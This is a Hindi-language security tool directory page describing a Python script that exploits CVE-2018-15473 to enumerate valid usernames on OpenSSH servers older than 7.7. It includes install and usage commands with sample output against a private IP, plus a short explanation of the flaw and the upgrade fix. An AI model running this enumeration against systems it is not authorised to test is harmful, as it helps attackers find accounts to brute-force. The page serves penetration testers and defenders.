Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-15473 — OpenSSH 2.3 < 7.7 - यूज़रनेम एन्यूमरेशन | Kitploit
उपकरण/GitHubGitHub/sait-nuri/cve-2018-15473
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubsait-nuri/cve-2018-15473

CVE-2018-15473

OpenSSH 2.3 < 7.7 - यूज़रनेम एन्यूमरेशन

रिपॉजिटरी देखें
421385 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-15473

SSH-उपयोगकर्ता-नाम-गणना-शोषण (OpenSSH 2.3 < 7.7)

मूल शोषण का संपादित संस्करण: https://www.exploit-db.com/exploits/45233

  • Python3 में रूपांतरित
  • उपयोगकर्ता नाम शब्दसूची विकल्प जोड़ा गया

चलाने का तरीका

#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users: 
root
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h

भेद्यता के बारे में:

सिस्टम वैध और अमान्य प्रमाणीकरण प्रयासों पर अलग-अलग प्रतिक्रिया देता है। एक दूरस्थ उपयोगकर्ता लक्ष्य प्रणाली पर वैध उपयोगकर्ता नाम निर्धारित करने के लिए विशेष रूप से तैयार अनुरोध भेज सकता है। इस प्रकार, एक दूरस्थ उपयोगकर्ता लक्ष्य प्रणाली पर वैध उपयोगकर्ता नाम निर्धारित कर सकता है।

समाधान:

OpenSSH सर्वर को संस्करण 7.7 या उससे ऊपर अपग्रेड किया जाना चाहिए।

टूल डाउनलोड करें